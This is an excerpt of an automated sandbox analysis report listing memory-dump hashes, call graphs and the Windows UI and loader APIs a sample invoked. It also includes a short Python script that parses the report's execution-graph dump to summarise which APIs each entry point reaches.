                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ceef15cc71a363a67460f68d22bd2dceb2f2b978ae75a5b11a51036b90981c71
                                                • Instruction ID: 7238ba3f65da7d04c996b6ff19add786614b767331d59d667625b9485aa65343
                                                • Opcode Fuzzy Hash: ceef15cc71a363a67460f68d22bd2dceb2f2b978ae75a5b11a51036b90981c71
                                                • Instruction Fuzzy Hash: 9AE08C705EA3468FD32A9AA4E9522A97BB0AB43324F0402BEC04587162D33A0847CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0914d9ad1d1c720a133e45c112a8cefeff9b4e3a701a15a4d723f87a1f450d82
                                                • Instruction ID: 154045953208ac12fcc857656a7bc9bce6da69586d901a87be929bed65fc6d3b
                                                • Opcode Fuzzy Hash: 0914d9ad1d1c720a133e45c112a8cefeff9b4e3a701a15a4d723f87a1f450d82
                                                • Instruction Fuzzy Hash: F1E08C705993859FC316EAA4EC156697BB8AB42324F0501AEC600C7162D7296892CB93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 77bc515c7385c18c6ad59c819ac0186c1a0c1d629967527c005e13cdec139573
                                                • Instruction ID: 9b62220c2084af263574f31b297b39d3768a7fe0de6fe802f5eac6be84655f73
                                                • Opcode Fuzzy Hash: 77bc515c7385c18c6ad59c819ac0186c1a0c1d629967527c005e13cdec139573
                                                • Instruction Fuzzy Hash: 8FE08670541209EFD714EFB8F94869EB7B5FB04308F500AA9C505E3214EB312F04DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0954405fbb328c78e4f2f00cd7ba1ab09b52a5ef946ed572b8ce1f16fd0e8da
                                                • Instruction ID: 77f69a691630c61a1f26988598fea957c75b50873c41e58eaccda0c051094323
                                                • Opcode Fuzzy Hash: c0954405fbb328c78e4f2f00cd7ba1ab09b52a5ef946ed572b8ce1f16fd0e8da
                                                • Instruction Fuzzy Hash: 33D01270455208DFC324EFA8FD5D729BBBCF70A355F405299D90853688EB316990CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a360695014f33427d0086e6305947f55888126abbbff61cb5bbfeb455741847
                                                • Instruction ID: f544366ac14fda5e3c59dee4f35bcfa46138d1652ca7450cad57d15a21e5af45
                                                • Opcode Fuzzy Hash: 0a360695014f33427d0086e6305947f55888126abbbff61cb5bbfeb455741847
                                                • Instruction Fuzzy Hash: 33C012744AA61D9FC314EE98F954729BB78F701754F8402A9890453254EB316980CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 074a2982592c5162a3a2296376514919a1e51fdf11fc202472ac85d8c565fc03
                                                • Instruction ID: 8c236270f1d592f4feebf5b352f4e37d6eb865c136a462d64d362e38f07673cf
                                                • Opcode Fuzzy Hash: 074a2982592c5162a3a2296376514919a1e51fdf11fc202472ac85d8c565fc03
                                                • Instruction Fuzzy Hash: 70C02270495208EFC300EA98F804729B77CE301318F800299860453200EB312880CA82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:14.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:348
                                                Total number of Limit Nodes:23
                                                execution_graph (the report serialises the graph as a flat node/edge list: "<node id> <address> [API name ...]" declares a node, "<from>-><to>" is an edge, and "N API calls" marks a callee whose APIs were collapsed into a count). Summarised per entry point (a node with no incoming edge), listing the Win32 APIs reachable from it and the call-site nodes in parentheses:
                                                • 6ac4db8 → SetWindowTextW (6ac4e00)
                                                • 6ac61b8 → SendMessageW (6ac61ff, 6ac6200)
                                                • 6ac8e78 → via 6ac8ea8 / 6ac8e99 → 6ac8eb8 → SendMessageW (6ac61ff, 6ac6200)
                                                • 9d8b68 → 9d9058 → 9d907b → LoadLibraryExW (9d92f0, 9d92e0) → 9d908b → GetModuleHandleW (9d9290); 9d9068 collapsed as "2 API calls"
                                                • 6ac4db0 → SetWindowTextW (6ac4db6)
                                                • 6ac44e0 → 6ac3588 → 6aca1ac → 6ac3474 → KiUserCallbackDispatcher (6acce9c)
                                                • 6ac3de0 → 9dda58 / 9dda70 → 9dddb8 → 9d9068 → LoadLibraryExW (9d92f0, 9d92e0, 9d94d0 via 9d8c94), GetModuleHandleW (9d9290); 9ddaee → 9de773 / 9de780 → CreateWindowExW (9df528, 9df565 via 9df420, 9df578 via 9dd33c); 9db904 / 9dcf11 → 9db674 → 9dd17c (collapsed as "4 API calls"), which also reaches 6ac8b48 / 6ac8b22 → 9dda58 / 9dda70
                                                • 6ac8270 → 9db674 and 9dd868 → 9dd17c, both collapsed as "4 API calls" (resolved elsewhere in the graph as LoadLibraryExW, GetModuleHandleW, CreateWindowExW, CreateWindowExW)
                                                • 6acbdc0 → 6ac3474 → KiUserCallbackDispatcher
                                                • 9db050 → 9db210 / 9db200 → 9d9020 → DuplicateHandle (9db278)
                                                • 9d4170 → 9d3d34 ("8 API calls") → 9d3d44 → 9d3910 → 9d3940 → 9d3f70 → 9d6538 → 9d7758 / 9d7768 → KiUserCallbackDispatcher (9d77b6); 9d697b → 9dac70 / 9dac80 → 9daf38 / 9daf2b → 9d8f98 → 9d903c → 9dbce7 → 9db664 → 9db904 (LoadLibraryExW, GetModuleHandleW, CreateWindowExW, CreateWindowExW) and 9dbd60 / 9dbd51 → 9dbe5f → 9db674 (same four calls), 9dbdcf → KiUserCallbackDispatcher (9dbe5a); 9d41c6 → 6ac3060 / 6ac304f → 6ac316a / 6ac3168 → 6ac35f0 / 6ac35f2 → 6ac3314 → 6ac3a60 / 6ac3a50 → 9dbd51 / 9dbd60 ("5 API calls"), 6ac3474 → KiUserCallbackDispatcher; 6ac3814 → 6ce0b20 / 6ce0b12 → PeekMessageW (6ce10e8, 6ce10e2), DispatchMessageW (6ce1c90, 6ce1c88), KiUserCallbackDispatcher (6ce1460 → 6ce1414, 6ce13b0 → 6ce13b3, 6ce13b8)
                                                • 6ce6e50 → 6ce6e70 → 6aca62f / 6aca653 / 6aca3d8 / 6aca3e8 → PostMessageW (6aca928, 6aca921)
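The execution_graph text above is the serialised form of the sandbox's call graph, which is awkward to read but easy to mine: node ids, addresses, API names and `from->to` edges are all whitespace-separated tokens. The following parser is an added example written for this page, not code from Joe Sandbox or from the sample; it reconstructs nodes and edges from that token format and, for every entry point (a node with no incoming edge), reports which Win32 APIs are reachable from it, which is the question a triager usually wants answered before opening the interactive graph. The `SAMPLE_GRAPH` string is a constructed excerpt copied from the dump in this report; the function and variable names are this example's own.

```python
import re
from collections import defaultdict

# Constructed excerpt of the execution_graph dump in this report (same token format):
# "<node id> <address> [API name ...]" declares a node, "<from>-><to>" is an edge,
# "N API calls" is the plugin's collapsed summary of a callee's APIs.
SAMPLE_GRAPH = (
    "execution_graph 34825 6ac4db8 34826 6ac4dfa 34825->34826 "
    "34827 6ac4e00 SetWindowTextW 34825->34827 34826->34827 34828 6ac4e31 34827->34828 "
    "35239 9d8b68 35240 9d8b77 35239->35240 35242 9d9068 2 API calls 35239->35242 "
    "35243 9d9058 35239->35243 35242->35240 35244 9d907b 35243->35244 "
    "35246 9d9093 35244->35246 35249 9d92f0 LoadLibraryExW 35244->35249 "
    "35250 9d92e0 LoadLibraryExW 35244->35250 35245 9d908b 35245->35246 "
    "35247 9d9290 GetModuleHandleW 35245->35247 35246->35240 35248 9d92bd 35247->35248 "
    "35248->35240 35249->35245 35250->35245"
)

NODE_ID = re.compile(r"^\d{5,}$")              # node ids are 5+ digit decimals
EDGE = re.compile(r"^(\d+)->(\d+)$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]+$")  # Win32 export names, e.g. CreateWindowExW


def parse_execution_graph(text):
    """Parse a dump into (nodes, edges).

    nodes: {id: {"addr": hex string, "apis": [names], "collapsed": N or None}}
    edges: [(src_id, dst_id)]
    """
    nodes, edges = {}, []
    tokens = text.split()
    i = 1 if tokens and tokens[0] == "execution_graph" else 0
    current = None  # node whose trailing annotations we are still reading
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            current = None
        elif NODE_ID.match(tok) and i + 1 < len(tokens):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "collapsed": None}
            i += 1  # consume the address token
        elif tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            if current is not None:
                nodes[current]["collapsed"] = int(tok)
            i += 2  # consume "API calls"
        elif current is not None and API_NAME.match(tok):
            nodes[current]["apis"].append(tok)
        i += 1
    return nodes, edges


def reachable_apis(nodes, edges):
    """For each root (no incoming edge) return the sorted API names reachable
    from it, keyed by the root's address. Collapsed "N API calls" nodes are not
    expanded, so the result is a lower bound on what the root can reach."""
    succ = defaultdict(list)
    has_pred = set()
    for src, dst in edges:
        succ[src].append(dst)
        has_pred.add(dst)
    result = {}
    for root, info in nodes.items():
        if root in has_pred:
            continue
        seen, stack, apis = set(), [root], set()
        while stack:  # iterative DFS; the dump contains cycles (e.g. 35240 fan-in)
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            if n in nodes:
                apis.update(nodes[n]["apis"])
            stack.extend(succ[n])
        result[info["addr"]] = sorted(apis)
    return result


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(SAMPLE_GRAPH)
    for addr, apis in reachable_apis(g_nodes, g_edges).items():
        print(f"{addr}: {', '.join(apis) or '(no resolved API)'}")
```

Run against the excerpt this prints one line per entry point (6ac4db8 reaching SetWindowTextW, 9d8b68 reaching GetModuleHandleW and LoadLibraryExW). Pasting the full dump from the report in place of the excerpt gives the per-root API summary for every entry point; nodes the plugin collapsed to "N API calls" keep their count in `collapsed` so you can see where the summary is incomplete.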

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 9df420-9df52f 233 9df565-9df5de 232->233 234 9df531-9df558 call 9dd33c 232->234 236 9df5e9-9df5f0 233->236 237 9df5e0-9df5e6 233->237 240 9df55d-9df55e 234->240 238 9df5fb-9df69a CreateWindowExW 236->238 239 9df5f2-9df5f8 236->239 237->236 242 9df69c-9df6a2 238->242 243 9df6a3-9df6db 238->243 239->238 242->243 247 9df6dd-9df6e0 243->247 248 9df6e8 243->248 247->248 249 9df6e9 248->249 249->249
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c6ec4efdecc2557a0ca8983c995d4b7f3d728348705e62c50684458f973c35cc
                                                • Instruction ID: 0005c35421601b3d069ced95034793b9847e93d878620035c756fac46b67f4c3
                                                • Opcode Fuzzy Hash: c6ec4efdecc2557a0ca8983c995d4b7f3d728348705e62c50684458f973c35cc
                                                • Instruction Fuzzy Hash: 12916BB1C09388AFDB16CFA5C8509CDBFB1EF5A340F1A81AFE4849B262D7354845CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 353 9d9068-9d9070 354 9d907b-9d907d 353->354 355 9d9076 call 9d7bf8 353->355 356 9d907f 354->356 357 9d9093-9d9097 354->357 355->354 408 9d9085 call 9d92f0 356->408 409 9d9085 call 9d92e0 356->409 358 9d9099-9d90a3 357->358 359 9d90ab-9d90ec 357->359 358->359 364 9d90ee-9d90f6 359->364 365 9d90f9-9d9107 359->365 360 9d908b-9d908d 360->357 361 9d91c8-9d9288 360->361 401 9d928a-9d928d 361->401 402 9d9290-9d92bb GetModuleHandleW 361->402 364->365 366 9d9109-9d910e 365->366 367 9d912b-9d912d 365->367 369 9d9119 366->369 370 9d9110-9d9117 call 9d7c04 366->370 371 9d9130-9d9137 367->371 376 9d911b-9d9129 369->376 370->376 374 9d9139-9d9141 371->374 375 9d9144-9d914b 371->375 374->375 378 9d914d-9d9155 375->378 379 9d9158-9d9161 call 9d8c54 375->379 376->371 378->379 384 9d916e-9d9173 379->384 385 9d9163-9d916b 379->385 386 9d9175-9d917c 384->386 387 9d9191-9d9195 384->387 385->384 386->387 389 9d917e-9d918e call 9d8c64 call 9d8c74 386->389 406 9d9198 call 9d95e8 387->406 407 9d9198 call 9d95c0 387->407 389->387 391 9d919b-9d919e 393 9d91c1-9d91c7 391->393 394 9d91a0-9d91be 391->394 394->393 401->402 403 9d92bd-9d92c3 402->403 404 9d92c4-9d92d8 402->404 403->404 406->391 407->391 408->360 409->360
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009D92AE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a4dacf6a9a0496fd176b3b9ee06de5a44fd610bf59fa09646faf3f7c50c9753d
                                                • Instruction ID: 61bd5340f5fdea0055d2851d125f6aba227c9468f21b35973d394321cd67de1b
                                                • Opcode Fuzzy Hash: a4dacf6a9a0496fd176b3b9ee06de5a44fd610bf59fa09646faf3f7c50c9753d
                                                • Instruction Fuzzy Hash: 9C712370A00B059FD724EF29C48579AB7F5BF88304F008A2ED59ADBB50DB35E845CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 410 9dd320-9dd33d 412 9dd33f-9dd343 410->412 413 9dd398-9dd3a7 410->413 414 9df578-9df5de 412->414 413->414 415 9df5e9-9df5f0 414->415 416 9df5e0-9df5e6 414->416 418 9df5fb-9df633 415->418 419 9df5f2-9df5f8 415->419 416->415 420 9df63b-9df69a CreateWindowExW 418->420 419->418 421 9df69c-9df6a2 420->421 422 9df6a3-9df6db 420->422 421->422 426 9df6dd-9df6e0 422->426 427 9df6e8 422->427 426->427 428 9df6e9 427->428 428->428
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4cf054eb3f288b021f787e47532896666f47cefaf0b590e6b19b0696170210d4
                                                • Instruction ID: ca0aa07d2e726cbad75a0760f4af7d01f640aaf0c4ba5de2089b8bf20ebc2de5
                                                • Opcode Fuzzy Hash: 4cf054eb3f288b021f787e47532896666f47cefaf0b590e6b19b0696170210d4
                                                • Instruction Fuzzy Hash: 56511FB1C04349AFDB11CFA9C890ADEBFB5FF49304F25866AE409AB211D7709885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 429 9dd33c-9df5de 431 9df5e9-9df5f0 429->431 432 9df5e0-9df5e6 429->432 433 9df5fb-9df69a CreateWindowExW 431->433 434 9df5f2-9df5f8 431->434 432->431 436 9df69c-9df6a2 433->436 437 9df6a3-9df6db 433->437 434->433 436->437 441 9df6dd-9df6e0 437->441 442 9df6e8 437->442 441->442 443 9df6e9 442->443 443->443
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 3c8e1c16d9b4ebf85db44fe2f137710a85de073ea8fa44273f230f2eb8ee8804
                                                • Instruction ID: 7dd9af9114fb8759040ab1f6b97ea716b09c6ad876375c88aaea2b0f611d9a84
                                                • Opcode Fuzzy Hash: 3c8e1c16d9b4ebf85db44fe2f137710a85de073ea8fa44273f230f2eb8ee8804
                                                • Instruction Fuzzy Hash: 2551D0B1D00309AFDB14CF99D885ADEBBB5FF48314F64822AE419AB310D775A845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 444 9df56c-9df5de 445 9df5e9-9df5f0 444->445 446 9df5e0-9df5e6 444->446 447 9df5fb-9df633 445->447 448 9df5f2-9df5f8 445->448 446->445 449 9df63b-9df69a CreateWindowExW 447->449 448->447 450 9df69c-9df6a2 449->450 451 9df6a3-9df6db 449->451 450->451 455 9df6dd-9df6e0 451->455 456 9df6e8 451->456 455->456 457 9df6e9 456->457 457->457
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 6fdb9eeb56dadbf3c62269019f80cf0655fc9ad963cf63aa7a351a0767f1c712
                                                • Instruction ID: edb87093488bff341a453728994a204276110e5f3447a00e8831294f8bb1e579
                                                • Opcode Fuzzy Hash: 6fdb9eeb56dadbf3c62269019f80cf0655fc9ad963cf63aa7a351a0767f1c712
                                                • Instruction Fuzzy Hash: 3C51EEB1D00308EFDB14CFA9D881ADEBBB5FF48314F64812AE419AB210D775A885CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 458 6ce13b0-6ce13b1 459 6ce1364-6ce1375 458->459 460 6ce13b3-6ce142a KiUserCallbackDispatcher 458->460 465 6ce137e-6ce139f 459->465 466 6ce1377-6ce137d 459->466 461 6ce142c-6ce1432 460->461 462 6ce1433-6ce1454 460->462 461->462 466->465
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: c1d6e91ecfe21b66f12080a6f73a8452d42e309d52f6134a1831b0898bbe5820
                                                • Instruction ID: 72463f1eb808180535bdaf2b943f1cbf23c651e42efe4eb98f5f402bc375dc0e
                                                • Opcode Fuzzy Hash: c1d6e91ecfe21b66f12080a6f73a8452d42e309d52f6134a1831b0898bbe5820
                                                • Instruction Fuzzy Hash: 212137B2D043498FDB10CF99D844BEEFBF4EB58324F14842AE559A3640C378A655DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 468 6ac4db0-6ac4db4 469 6ac4db6-6ac4df8 468->469 470 6ac4d81-6ac4d94 call 6ac4228 468->470 471 6ac4dfa-6ac4dfd 469->471 472 6ac4e00-6ac4e2f SetWindowTextW 469->472 479 6ac4d99-6ac4da0 470->479 471->472 474 6ac4e38-6ac4e59 472->474 475 6ac4e31-6ac4e37 472->475 475->474
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06AC4E22
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: c9cefa1267ed60e7a7f57eab8976b2dc0ca1f113ad8fe38d754ed3fb1827649a
                                                • Instruction ID: 3617db7ce584fc8d5ee11d3b85fb576922215cec931647c6bb94223d313c656a
                                                • Opcode Fuzzy Hash: c9cefa1267ed60e7a7f57eab8976b2dc0ca1f113ad8fe38d754ed3fb1827649a
                                                • Instruction Fuzzy Hash: BB214A72D002098BDB20DF9AD844AEEFBF4EF88224F05846ED429A7640D734A546CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 480 9d9020-9db30c DuplicateHandle 482 9db30e-9db314 480->482 483 9db315-9db332 480->483 482->483
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DB23E,?,?,?,?,?), ref: 009DB2FF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 83bb2102bdc3760dbd6a423a2a4eda03b1f04527411454b8407e8b4d31d453c7
                                                • Instruction ID: ecd3a1bcdf380197d9d79b373985a0f5a1c93fa9ebf4bdd504b703915b4de03c
                                                • Opcode Fuzzy Hash: 83bb2102bdc3760dbd6a423a2a4eda03b1f04527411454b8407e8b4d31d453c7
                                                • Instruction Fuzzy Hash: D52105B5901208EFDB10CF9AD884AEEFBF8EB48324F15841AE915A3310D374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 486 9db270-9db30c DuplicateHandle 487 9db30e-9db314 486->487 488 9db315-9db332 486->488 487->488
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DB23E,?,?,?,?,?), ref: 009DB2FF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: d9e1c9c6f257edd2b6f3b9ab5a94988ffb69e6c5c2df28d40d300dab261263b6
                                                • Instruction ID: b49e905af18cbdc47cedffcb8fe2ff09e4b3670f1b153e3f56bcdc7d1e090c15
                                                • Opcode Fuzzy Hash: d9e1c9c6f257edd2b6f3b9ab5a94988ffb69e6c5c2df28d40d300dab261263b6
                                                • Instruction Fuzzy Hash: 072122B5901208DFCB00CFA9D484AEEFBF4EB48324F14842AE954A3310D334A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CE1150
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 424b4c30a502adf6c45257a1c4fa8fe46bc009c62a52300bcc8334622a7dd097
                                                • Instruction ID: 9930ec855b4c85429bae60edfc2d13320c3d5e7e666d9cbde7a5994d3098f634
                                                • Opcode Fuzzy Hash: 424b4c30a502adf6c45257a1c4fa8fe46bc009c62a52300bcc8334622a7dd097
                                                • Instruction Fuzzy Hash: BE110AB5C002499FDB10CF9AD844BDEFBF8FB58364F148429E555A3640C374A555CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9329,00000800,00000000,00000000), ref: 009D953A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6fed9c04d0edba1d0bdeb730569a6ee17804bbce289d05272eeccc0986be8df2
                                                • Instruction ID: 854622d428d9926a1655134a793d45ed7c507b3ef66a166d8914ceae946a1ea1
                                                • Opcode Fuzzy Hash: 6fed9c04d0edba1d0bdeb730569a6ee17804bbce289d05272eeccc0986be8df2
                                                • Instruction Fuzzy Hash: 4211F2B69002089FDB20DF9AD844BDEFBF8EB48324F14842AE915A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009D77CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: de0b7a0ac4333b659589f6c829aea3e0671629429e9d958abbf3801078d40f07
                                                • Instruction ID: da7f5d89676515e0e0c59c1fd25d010677372050bfeeee7b1cef5e0e271a120a
                                                • Opcode Fuzzy Hash: de0b7a0ac4333b659589f6c829aea3e0671629429e9d958abbf3801078d40f07
                                                • Instruction Fuzzy Hash: 9321AEB18043958FDB11CF98C4087EABFF8EF05314F1484AED041A7242D7789A48CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06AC4E22
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: bcdc07a221790cab174ddde682e263f9eba3a6875cb7101eb4bb3d3d89930041
                                                • Instruction ID: 95aebe9da584cb0af8df813c08a7ef76411b0d77e3dd37ca2edfa3c7b3faca73
                                                • Opcode Fuzzy Hash: bcdc07a221790cab174ddde682e263f9eba3a6875cb7101eb4bb3d3d89930041
                                                • Instruction Fuzzy Hash: C311D3B2D002498FDB20CF9AD844BDEBBF4EB89324F15842AD865A7640D378A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CE1150
                                                Memory Dump Source
